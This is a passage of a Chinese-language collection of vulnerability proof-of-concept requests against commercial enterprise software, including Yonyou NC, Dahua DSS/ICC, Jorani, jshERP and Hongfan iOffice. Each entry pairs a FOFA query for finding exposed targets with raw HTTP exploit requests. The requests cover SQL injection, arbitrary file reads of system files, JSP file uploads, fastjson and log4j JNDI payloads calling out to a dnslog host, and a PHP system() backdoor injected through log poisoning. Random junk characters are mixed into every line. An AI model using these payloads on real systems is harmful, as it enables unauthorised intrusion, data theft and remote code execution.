: s) O% ?) y% t \" A$ b$ T+ d7 B. KFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台": q$ f% e; g3 p& `3 I' N
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1( q3 w- w$ U$ {6 j! `
Host: 127.0.0.1/ D. y6 D9 U% \: @$ [" c6 J+ i
Pragma: no-cache
. Y1 ^; d4 z/ t" ?& f1 q6 W/ X- u9 ICache-Control: no-cache: _/ G+ M4 A! y7 t% h5 I; w5 F
Upgrade-Insecure-Requests: 16 e' n8 g8 `1 a6 I, B$ d2 d9 Q9 _6 b) a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- F; b0 \) K: L* T# aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" q1 _ f. j0 G" q- |7 N
Accept-Encoding: gzip, deflate1 B- L; T3 q5 D
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
/ d- p* I6 g+ oConnection: close) p2 n: r! r5 O; s* q1 Z
9 _7 j, }4 A6 T( W$ K: H
" A8 v0 Y0 T5 b, x, I( B12. Jorani < 1.0.2 远程命令执行3 d. F; ]2 {( V# P) H
FOFA:title="Jorani"
: Y6 v" p4 y- o) p& P第一步先拿到cookie
+ z" L2 }( s3 P/ I* `: CGET /session/login HTTP/1.11 Z4 q: Q* E, H6 S; s; t
Host: 192.168.190.30$ i# }- Y* X9 `& c$ ~6 S) l
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.364 R/ I4 a( m7 E) g( O( o
Connection: close
; I: i5 l6 ^ @3 HAccept-Encoding: gzip
: e" z$ x. n' A+ U& n( k
/ O/ d8 [' {4 n% s
) r, G$ ]1 ?, F/ R* `4 K ^" _响应中csrf_cookie_jorani用于后续请求
. Z p4 i4 N$ z* n# H6 iHTTP/1.1 200 OK; ]$ b8 v% u' P8 h( B
Connection: close
+ x0 |, x6 N2 l, O! UCache-Control: no-store, no-cache, must-revalidate: E. O7 }4 \1 S. B) H H5 N2 M& c
Content-Type: text/html; charset=UTF-8; c& P7 p N( A' `
Date: Tue, 24 Oct 2023 09:34:28 GMT
% O: ?4 Z, j1 m6 y" pExpires: Thu, 19 Nov 1981 08:52:00 GMT
: `7 [% u1 D8 a" h; T# @, P! F, d) |" JLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT' e1 W1 N/ T# O" S( Q, f7 {, W3 ^8 t
Pragma: no-cache
* [) c. ?3 y. v5 \ ^! kServer: Apache/2.4.54 (Debian)) r& f1 G0 f- d& q7 n
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
3 X9 Z- X) T% M" ~- H) |! hSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
8 i. o3 G" K2 a% r4 F" T& PVary: Accept-Encoding
3 n2 `' ^5 x8 M+ \6 t* Z
. W$ f* Y" w0 x) J% n( V* f' y
1 [; T2 Y( J; }4 }0 @POST请求,执行函数并进行base64编码8 q9 N3 G0 D: g) F8 ~
POST /session/login HTTP/1.11 ?3 q6 `7 e' l i$ P% u- t5 @
Host: 192.168.190.30 K$ f1 t2 v4 n! d, v( c, z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
1 |- c7 l; L/ EConnection: close/ ?3 W, }8 Q' n
Content-Length: 252
7 y9 J# F M2 V$ BContent-Type: application/x-www-form-urlencoded8 g/ n+ A1 |% y' v6 E- Q+ `
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r$ Q9 z# G& E' c# l O5 G
Accept-Encoding: gzip
& N+ ]* |8 G% G0 w! P0 F; r
; c) S! `/ n7 x2 ^% Hcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
; v% E6 m. _5 X: |3 Q* y* q
6 a7 a$ i' K7 k4 z6 D2 g& [
$ C6 e0 V# f5 I; N
3 o1 y3 m% A% o4 U向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串9 x+ {3 F* G ^ Z( L+ U, V" V! V
GET /pages/view/log-2023-10-24 HTTP/1.1
, q$ J/ \+ E9 B6 \6 I- p# BHost: 192.168.190.30
$ B' O/ O* A0 h- N3 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
: p, Z1 R' j* u3 @! O, j lConnection: close( Y0 r, x8 k g
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r/ w# `8 ^& y. w! W# E) P
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=* _% q5 B6 Q/ W5 U# q
X-REQUESTED-WITH: XMLHttpRequest
, [. x( r& w# V* dAccept-Encoding: gzip
7 V- A$ v5 P& a2 R: t2 I8 r9 z5 b. X- i, M& d( H9 \5 @& w: N
) V6 w" \% _ m' m1 q( b4 r13. 红帆iOffice ioFileDown任意文件读取# \1 X2 ~0 {/ l) V$ p
FOFA:app="红帆-ioffice". s2 O# Q9 T- U7 z. b
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
0 I/ n# {" O g6 X2 X, z( r0 tHost: x.x.x.x
- b- N& }: }, X+ ?' K" V4 x' f7 {User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
7 h" j! V0 ^6 p2 A9 x* ^Connection: close/ Q! K5 s# y- r/ R; R) `
Accept: */*, b& [, E+ i2 f; ^
Accept-Encoding: gzip
$ t$ X4 M" x, m! {7 \* Q9 m4 `0 q6 I& T
( B( Q$ y( f. j! `' R- k
14. 华夏ERP(jshERP)敏感信息泄露4 @/ N0 ?1 w3 n: ^) U
FOFA:body="jshERP-boot"
: s2 P* J- w+ m( ^& ~泄露内容包括用户名密码
6 U* c: Y2 y! S$ ]7 wGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
' p. i$ a/ K) |6 M! {Host: x.x.x.x) f' a y/ ?/ \6 S, b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
+ Z, ?5 I' O9 e# EConnection: close& h( }8 R$ l, c% O4 r6 }8 I+ U2 [
Accept: */*3 ^, D; v% |3 f- ]
Accept-Language: en2 @6 c8 j, g- ^; ]- H
Accept-Encoding: gzip
3 g' U M% N$ X' J; @' j8 [, H* I \5 S2 F7 j
* K/ S9 `3 m! i/ o6 {7 l: M15. 华夏ERP getAllList信息泄露
* |8 j+ P, s. I; }8 l7 t' dCVE-2024-04907 p. g" d) G6 u
FOFA:body="jshERP-boot"
! W- y" R* o% K泄露内容包括用户名密码
0 `; z! L' c, ^0 pGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1; r% A# }( N3 g: p9 j( `2 T; d
Host: 192.168.40.130:100
/ J8 w) `+ i8 x, i, _4 H2 q" C* vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
- N" r1 q+ y# }5 I- kConnection: close0 |8 T4 W; _1 O4 T, F6 [
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
+ M; E: o4 f9 _5 ~% p$ kAccept-Language: en1 A# x+ n' {. h1 N- _- b
sec-ch-ua-platform: Windows* ` `6 h! A7 y6 ~) X, P
Accept-Encoding: gzip5 q; P$ a0 A: ?9 d
+ N9 m1 h; Y& w: E% K! r
& g& K6 Y% o+ t7 A X9 p16. 红帆HFOffice医微云SQL注入! Z) M; ~; Z) m& y" ~9 ]
FOFA:title="HFOffice"7 v: R' T7 I3 r/ C6 k9 B: `
poc中调用函数计算1234的md5值
! i' _$ Q) J7 J) h( x! A9 kGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1. [, i0 o; E! }& x
Host: x.x.x.x/ s; y# H$ X: S' [! M3 o* b1 t) }
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36, F+ Y$ ?7 _( R' D
Connection: close7 _( R: ^, _' N. }# o$ {
Accept: */*
' [9 c/ X6 `3 g, J. gAccept-Language: en
" g$ [' d C0 s9 m( D8 S" _9 h; KAccept-Encoding: gzip
/ M" z$ c2 s" S: i6 _# w. G$ X
+ N7 T% _9 Q9 q# i* z) @2 d
% X% x4 z5 W! ?: k; s5 }7 D2 L17. 大华 DSS itcBulletin SQL 注入
( J2 D! J* S! g& O, H) q( YFOFA:app="dahua-DSS"
7 r- e' ]& `( h2 G0 b, `POST /portal/services/itcBulletin?wsdl HTTP/1.1- o* I" q6 G) a2 | [. k! i
Host: x.x.x.x
( \2 B" ]% H2 M; m$ nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( C+ C" s, {( ]5 E
Connection: close- i3 V( T; @/ A2 A4 o
Content-Length: 345% m; ]* X$ }* c4 U
Accept-Encoding: gzip8 f9 [$ O5 f$ A) y1 S
" J+ S1 e2 k, N% e* P v0 @( m# V<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>7 j4 }$ r7 i2 E- H
<s11:Body>3 p" a3 _1 r8 T$ h! x
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>% j% I% I8 M0 J& `
<netMarkings>
' \0 S8 V8 f$ n- x5 ]3 p (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
$ Z- L# ~8 t- a* E$ k( j/ {. w* C1 ^ </netMarkings>
. H2 R* h* {9 h7 z2 K4 I2 l </ns1:deleteBulletin>
3 s7 p# \3 r- V0 e8 x5 X( J1 n+ T% q </s11:Body>. U; d% f6 g! n) I; f* c% K
</s11:Envelope>
1 l0 ]; \+ F5 `- y+ q# e7 q0 E- E5 W4 @0 [ J. |- {
* b% l& T3 ]! y18. 大华 DSS 数字监控系统 user_edit.action 信息泄露 s, M7 [# p7 z5 D$ ?
FOFA:app="dahua-DSS"
0 c! q3 {" S0 A! Y/ UGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
" a! D6 w! R# j8 IHost: your-ip( A1 T8 Z# m4 ^' B1 y' z# n/ J& D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: Z* \/ G/ v, r w C
Accept-Encoding: gzip, deflate
L' a' m$ h0 u& {Accept: */*% P0 @+ ?$ C* L+ q
Connection: keep-alive
& [$ d' m$ M' h( w: X. d! ~$ |/ j# q: {, t( w& F5 B- e f+ x: g' |9 _
) m H, D4 \ j" v% d
( p# j/ e5 v: A6 E% ]% E7 {19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
+ M- z! J2 v& A% NFOFA:app="dahua-DSS"
. V, k# v$ w& ]0 PGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
1 {6 p# q8 K' ]% Y$ l* v+ b2 ~Host:
6 f& y6 \/ l; R2 {2 M' jUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
! Y1 v7 p# `4 @: n+ r# rAccept-Encoding: gzip, deflate4 \$ n( t1 L/ t* k, C
Accept: */*
. b7 C& i% i% E2 {- BConnection: keep-alive y3 o1 P) y3 g
6 i! I- D$ g$ U% k0 u0 D1 e3 T
9 k, A: u- C4 e20. 大华ICC智能物联综合管理平台任意文件读取$ w+ F# c' m8 b3 z; _0 e6 E
FOFA:body="*客户端会小于800*"+ K/ f0 [5 O! |+ G! R0 u
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
2 y# x$ _' M3 p. @* ^1 H+ VHost: x.x.x.x
, T7 X" j c- N) hUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ a7 J! W$ f1 Q- w7 O4 h
Connection: close# M6 Q! c) x/ }8 ^* |3 Z& S: d( D
Accept: */*: @* z9 v6 h8 v* S2 ]2 l& v
Accept-Language: en
+ k! A" A2 f1 a b' B" K bAccept-Encoding: gzip$ R& E) I: L; z
8 s: l' I# i4 a+ C( t( ^
& ~2 s+ Y: c- f# u5 N% J. n# i
21. 大华ICC智能物联综合管理平台random远程代码执行
8 E- J3 Q" H: KFOFA:icon_hash="-1935899595"8 e7 t8 o7 n0 P) D) m
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1, X- ]" p2 `" @
Host: x.x.x.x0 o# j( k7 h4 L; X! h) [4 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 T& a! J% s. J- fContent-Length: 161- T( C6 ]5 K$ N
Accept-Encoding: gzip
! I- x0 p: d/ VConnection: close5 v8 ?& W" h$ `+ o
Content-Type: application/json;charset=utf-8
! g. F0 O# U) [9 x. t9 M, j" \) F" H, b: Y
{
6 @5 x: g; d( V: r9 g! ~, r! ["a":{* d0 j# O5 T+ w
"@type":"com.alibaba.fastjson.JSONObject",- d: Z& b* N) `- P: r' V6 v1 ?8 E. E; z
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}3 a: t# m; o _
}""
* e; J/ t4 J! i$ u. b}
3 [% k2 g( R* [ X9 f# H5 w% p: W: c* j* E- P$ Y& g
1 ~9 G/ o" ~) t" n/ i22. 大华ICC智能物联综合管理平台 log4j远程代码执行( D2 ^5 Z; @9 V5 J8 Y u$ Z
FOFA:icon_hash="-1935899595"6 _; o5 }$ [7 j0 M8 L
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
* ~$ }$ g9 d* t+ j) d* e+ PHost: your-ip' f* k/ @1 |3 l; f. l T5 y& K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; d* B4 z# p# t
Content-Type: application/json;charset=utf-8
. f2 K8 q7 x- w) x/ f% q0 u
- H: A- t7 E; I U4 H9 [{: k3 v' w, A) s
"loginName":"${jndi:ldap://dnslog}"
1 Z ~3 ?5 f5 _8 u S; o) v8 b}- x. d! ~9 ?6 I' s9 O2 Q
% d% T' v" q( |- d/ K: y: r4 t" F L+ G% ?4 c1 C$ s% ?& z
/ ?# o+ x& m" m3 g/ P2 Q6 n
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
b8 ~0 z0 B4 bFOFA:icon_hash="-1935899595"
1 V X6 Z' p' D _5 TPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
5 {0 s- P6 t0 p* Y# m; Q! KHost: your-ip- w x4 e8 z' I+ y8 @6 x9 m, @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. K9 [# U7 g3 X
Content-Type: application/json;charset=utf-8
5 t+ h" d7 _. s- j) aAccept-Encoding: gzip
2 m4 Y0 m$ U. N. {! T4 b7 fConnection: close
# R. L8 o* Z+ M9 b- j; K) L2 t8 w- s5 {, a6 i! I0 S
{/ h4 \( |$ U& O/ P
"a":{3 j4 \6 S) u! k% z' Q
"@type":"com.alibaba.fastjson.JSONObject",
/ q1 m K, @+ F- K {"@type":"java.net.URL","val":"http://DNSLOG"}. ^3 n/ s0 c5 K1 r0 T. c
}"". V& h/ o3 A4 R% |9 t. R
}6 |6 `( f2 H0 I2 `6 g* a- z
" d. t6 \& z+ Y
* Q! q# B0 K. l" m3 D ?24. 用友NC 6.5 accept.jsp任意文件上传& m+ u, P% O; f' V* ~
FOFA:icon_hash="1085941792"# p3 d/ ~# \+ r
POST /aim/equipmap/accept.jsp HTTP/1.1& W' }3 @) T; j b/ L! ]
Host: x.x.x.x
; ^$ E1 {& m0 TUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
, L! C; I5 M! ~Connection: close
9 X! e$ }+ p( H. WContent-Length: 449! V, }0 T/ N2 J4 P# o" S
Accept: */*
6 w* s# s( e6 oAccept-Encoding: gzip
4 s, F. f% i7 j3 H6 {' J2 YContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc$ P- C3 }# ?2 a- S* N: [
) h) v! H+ y6 y; ^) {
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc3 }: Q" D3 Z9 n: e6 h4 F
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
9 e8 ] V5 s1 M) L3 ^Content-Type: text/plain( b q2 Q6 ~8 c+ W. a$ y9 _% w1 x7 G
4 `2 W$ y9 E. e/ w6 }
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>. C" e. E6 F8 ?
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc! }9 d- a" F' ?. @9 |% S' {4 j
Content-Disposition: form-data; name="fname"
1 [0 P2 B: v: B5 @
3 {' q" e# @; P [\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp, {/ k5 }6 e2 j
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--3 y, v+ u7 k/ O1 r- C* }
4 u) V; N1 }$ V" }5 p8 [
" Y I8 |' t7 _) P; e f, e25. 用友NC registerServlet JNDI 远程代码执行& C/ a9 N3 ~8 x2 h. l# J+ U$ {
FOFA:app="用友-UFIDA-NC"
) X" T4 c1 ?- M" m R k6 h8 rPOST /portal/registerServlet HTTP/1.1
+ ~2 `# b) t' H# K0 _6 QHost: your-ip
4 P2 o, k( p& y* y1 x% \3 G; CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.03 _9 s( f0 u. g7 `2 x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.97 M0 e( r: u- w
Accept-Encoding: gzip, deflate3 ?% V9 u: m0 \: e
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
, Q1 g! F6 y7 V. H- ~( CContent-Type: application/x-www-form-urlencoded7 v! F, R, Q% f, S/ y8 P
, r, p, `+ Z/ e& B! ctype=1&dsname=ldap://dnslog
6 R5 A3 R9 C: l- C2 e3 e
0 a2 a5 r8 E1 y+ P6 V% X1 }
8 b9 i0 v. k# _& P2 D0 B1 Y! n% b1 T/ \& N
26. 用友NC linkVoucher SQL注入
/ Y) d* n" y% u( `1 EFOFA:app="用友-UFIDA-NC"
/ a$ U* B9 Y/ {# TGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1' K" V, P1 L0 R s* _* p2 d( f
Host: your-ip
4 c3 W3 m- v9 N4 P$ F p$ Y+ a# XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- {) T/ F7 m; k& c f
Content-Type: application/x-www-form-urlencoded) Q+ X7 c; [" P& t" R: ]
Accept-Encoding: gzip, deflate
2 {3 t8 {# O9 z; Y8 EAccept: */*& v% ]" S. d$ s% }8 S: Q
Connection: keep-alive* z* g' n! u# O: P
( m2 f! z( Z1 d6 ~- p
4 \8 b: U: O5 @8 n: t27. 用友 NC showcontent SQL注入
' c2 F: |' r0 `4 d0 MFOFA:icon_hash="1085941792"
2 u$ n: {! u0 W7 Z& nGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
- _# a. |/ C3 r6 B$ ^Host: your-ip8 d8 o' B1 }$ k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. Y2 |, ~! H5 s F, z4 v7 g
Accept-Encoding: identity: W7 f9 r) n. }, y6 X6 j: b
Connection: close2 M3 L5 e8 E9 |& c' j( O( q. a
Content-Type: text/xml; charset=utf-8, z5 W. o5 \' ]) I
- [3 N1 j# O6 G( p( ^
# b) B+ O" U8 m* e
28. 用友NC grouptemplet 任意文件上传1 K; [2 B; p: b# |
FOFA:icon_hash="1085941792"4 _8 R! L5 ^' ^/ }/ z
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
1 f' \& j ]* DHost: x.x.x.x: P/ r1 z' Z: O" t' ~# G$ j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
6 M# U% _# q9 E) W) w/ ~8 xConnection: close$ b4 G1 {; j D3 k& {
Content-Length: 268
7 U( T& r2 }1 G9 _Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
3 t0 o" ~+ a& S6 L2 N/ ~Accept-Encoding: gzip
& @3 z% |. e2 Y
* r6 |0 }) p1 K9 f& l6 c' h------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk3 D$ ~+ {! h/ `: l0 c; ?
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"5 u/ S: k( g1 ]$ w2 x5 N
Content-Type: application/octet-stream0 E! U7 n4 ~9 A9 c. W
8 j w* E/ q" ]9 x- `1 V<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>8 j- b+ d( ^3 u, ^8 {
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
7 q2 v& i z* P. B: h v8 j5 c3 _
% m( \& Y6 J: S5 G" V. y* r2 V$ L! U, A3 i8 k: i
/uapim/static/pages/nc/head.jsp/ B" n7 I' ?2 w
# d; l/ [3 u# E
29. 用友NC down/bill SQL注入0 V% j8 o1 {/ ^. x4 F3 W0 B
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
' \- ~; E, Q. K, p a! ~6 _# RGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.10 R# I6 R- J, n: o$ C
Host: your-ip
. c, F6 k* E. u, v& g" c, ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 \ m3 b) }6 t6 S, j z' z0 NContent-Type: application/x-www-form-urlencoded6 W+ ~- g0 E9 a. T/ F; {# d
Accept-Encoding: gzip, deflate. U+ ~: B3 M; M
Accept: */*
- m H# P9 a6 y1 {( ^* a0 TConnection: keep-alive
- C+ o( `8 l; a& z; v" V
" Q" Y. ?$ y" _: p. I
7 z& l* k5 B! D6 k1 y+ P30. 用友NC importPml SQL注入- @- n0 C$ A: G# [: ]
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
6 n( _9 ]) {) V: ?, FPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
7 z3 w; G0 P7 }) M: B( h. R5 t8 `Host: your-ip% O; W) Q7 v( P0 z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V$ H+ ]& W; r$ C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36. {! t8 t2 L/ ?, C. M
Connection: close
7 d2 Q# A2 ]+ x' `: C
( e! F% T# f# p, N6 V------WebKitFormBoundaryH970hbttBhoCyj9V
8 U9 d' i/ S. d" R2 QContent-Disposition: form-data; name="Filedata"; filename="1.jpg"8 `" l9 I) U1 e
Content-Type: image/jpeg
9 K& L+ Y( W9 [0 t- e0 n------WebKitFormBoundaryH970hbttBhoCyj9V--
[2 C0 Q+ K- H8 `6 Q* b! a$ F! g( w( P. t5 O/ r- @+ n. e
* a+ L9 ?7 R# b( d L6 W31. 用友NC runStateServlet SQL注入
0 X- W. h6 t& N4 rversion<=6.5
/ V1 K; z& M" k9 V5 iFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
1 M( x5 c- p' X. C( B/ o$ C6 p: @& LGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. H9 k. [. `' g4 \% {3 ~- e2 WHost: host" e: f( L7 l6 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.360 w1 [" `2 P/ ^+ D
Content-Type: application/x-www-form-urlencoded# Y- N% Q0 W0 O
9 q6 h C& |/ J# b: {
7 l8 H7 T- d/ T9 C9 E- S8 A7 M
32. 用友NC complainbilldetail SQL注入0 G* q8 G) p8 T) J, x( x( C+ L
version= NC633、NC657 U1 ?" P% C2 b0 q
FOFA:app="用友-UFIDA-NC"
7 Y1 b) F- j/ m$ p# D, F! n. rGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1# w! i' R2 N4 t K) D: {
Host: your-ip1 `. {" X- o; y, q" A' h3 a) |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 u/ j% C. y$ C9 LContent-Type: application/x-www-form-urlencoded
8 Q% w) R0 ]% V& ]Accept-Encoding: gzip, deflate
7 ` c1 H; a7 P% b! BAccept: */*
0 u1 a/ V) a6 R. wConnection: keep-alive
* `+ L- B6 d) v
0 s: e3 o& l) r0 r5 V- ^4 C& U U7 m/ x1 b# \6 x4 q/ C
33. 用友NC downTax/download SQL注入
6 A$ q. p& B c0 n1 tversion:NC6.5FOFA:app="用友-UFIDA-NC"! }. j/ x* o. P; E( m9 V' P" \+ W6 F
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.18 T ^: J# X# w
Host: your-ip
8 y" t/ J- A5 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ E z8 T+ i) e8 {: L" E
Content-Type: application/x-www-form-urlencoded
; z5 s) y, o. A6 ~Accept-Encoding: gzip, deflate
0 s% @0 p2 Q( E' `9 Y8 t3 ?! gAccept: */*
7 s& X* G" _2 S2 e" h% sConnection: keep-alive" z* }) [( k& u0 j0 Z
! }! Q7 x7 K7 m
1 p% f- T3 b6 ^# D/ h34. 用友NC warningDetailInfo接口SQL注入, n' G0 f0 C/ w6 h' T' R& q' o, j, Y3 X
FOFA:app="用友-UFIDA-NC": F- a' M9 Z( ]1 v1 Y/ h) S
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
3 A4 ~5 ]$ W- Q$ h: k2 s5 eHost: your-ip
/ o8 n% D6 m1 q% AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ Q2 j* G( U+ c. ~9 qContent-Type: application/x-www-form-urlencoded' ]( X+ i4 j3 X
Accept-Encoding: gzip, deflate* E& _9 D" c' I$ A& X
Accept: */*! z2 \$ d6 A' G. y4 @
Connection: keep-alive" Y0 B, x! W" w/ k$ w
$ \5 g9 j( J! D: |* `7 \; i; E- o! e% b/ c6 R" r) S+ C1 k
35. 用友NC-Cloud importhttpscer任意文件上传# q- P2 L! a& g7 r( `; N
FOFA:app="用友-NC-Cloud"
